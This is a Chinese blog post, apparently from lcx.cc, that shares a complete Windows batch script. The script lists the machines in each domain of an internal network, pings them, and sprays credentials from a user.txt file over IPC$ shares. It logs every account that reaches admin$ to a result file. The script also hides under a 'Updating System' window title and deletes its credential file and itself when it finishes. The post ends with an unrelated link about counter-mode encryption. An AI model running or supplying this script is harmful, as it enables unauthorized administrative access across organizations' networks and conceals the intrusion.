【Bat】扫描内网指定用户能获取管理权限的机器

一个BAT脚本，自动获取内网机器列表，自动判断在线，自动扫描然后记录到日志.......

自动修正域名，自动判断域。。。不废话了，发代码

=========================user.txt=========================
格式：
domainusername password
username password

=========================getadmin.bat=========================
@echo off
setlocal ENABLEDELAYEDEXPANSION
title Updating System ......
set log=%systemroot%result.txt
set usertxt=%systemroot%user.txt
if not exist !usertxt! (
echo !usertxt! not exist
goto :eof )
set Dline=0
set Totacmp=0
set AllComputers=0
set online=0
set offline=0
set splitbig=echo =====================================================================
set splitsmall=echo ---------------------------------------------------
set nullline=echo.
echo Current Time: %date% %time%
echo UserDomain: %USERDOMAIN%
echo Current ComputerName: %computername%
echo Current UserProfile: %UserProfile%
%splitsmall%
%nullline%
echo c:^^>net view ^/domain
net view /domain
%splitbig%
@FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do (
%nullline%
set /a Dline+=1
set /a Totacmp=0
set online=0
set offline=0
set dmain=%%J
@echo c:^^>net view ^/domain:%%J ^/^/The !Dline!th Domain
%splitsmall%
@FOR /F "usebackq eol=; delims=, " %%i in (`net view /domain:%%J ^|findstr ""`) DO (
set /a Totacmp+=1
set temp=0
@FOR /F "usebackq eol=; tokens=1,2,3* delims=" %%a in (`echo %%i`) do (
set ifonline=OffLine
set Reply=unno
set Pinging=unno
set hostname=%%a
set hstname=%%a
set ip=unno
for /f "delims=" %%i in ('ping -a -n 1 -w 100 %%a') do (
for %%b in (%%i) do if defined %%b (
if %%b == Reply (
set ifonline=OnLine
set /a online+=1
set temp=1
)
if %%b == Pinging (
FOR /F "tokens=1,2,3,4* usebackq delims=: " %%K IN ('echo %%i') do (
set ip=%%N
)
)
)
)
if /i !temp! EQU 0 (
@echo %%a !ifonline!
) else (
echo !hstname! !ip! !ifonline!
FOR /F "eol=; tokens=1,2,3,4* delims=, " %%B in (!usertxt!) do (
set user=%%B
set pass=%%C
echo %%B | find ""
IF NOT errorlevel 1 (
set user=%%B
) else (
set tempuser=!dmain!!user!
echo net use !hstname!ipc$ "!pass!" /user:"!tempuser!"
@net use !hstname!ipc$ "!pass!" /user:"!tempuser!"
IF NOT errorlevel 1 (
echo dir !hstname!admin$
@dir !hstname!admin$
IF NOT errorlevel 1 (
echo !hstname! !tempuser! !pass! !ip! !dmain! >> !log!
%splitsmall%
)
net use !hstname!ipc$ /del
)
set user=!hostname!!user!
)
echo net use !hstname!ipc$ "!pass!" /user:"!user!"
@net use !hstname!ipc$ "!pass!" /user:"!user!"
IF NOT errorlevel 1 (
echo dir !hstname!admin$
@dir !hstname!admin$
IF NOT errorlevel 1 (
echo !hstname! !user! !pass! !ip! !dmain! >> !log!
%splitsmall%
)
net use !hstname!ipc$ /del
)
)
net use * /del /y
)
)
)
%splitsmall%
set /a offline =Totacmp -online
echo Computers in Current Domain Status :
%splitsmall%
echo Total Computers : !Totacmp!
echo Online Computers : !online!
echo Offline Computers : !offline!
set /a AllComputers+=!Totacmp!
%splitbig%
%nullline%
)
echo Total Domains is: !Dline!
echo All Computers In All Domain is: !AllComputers!
del !usertxt!
del %0

文章来源于lcx.cc:【Bat】扫描内网指定用户能获取管理权限的机器

相关推荐: 【文章】9.9 计数器模式 分组密码算法 加密

9.9 计数器模式     计数模式下的分组密码算法使用序列号作为算法的输入[824，498，715]。不是用加密算法的输出填充寄存器，而是将一个计数器输入到寄存器中。每一个分组完成加密后，计数器都要增加某个常数，典型值是1。该模式的同步和错误扩散特性同OFB…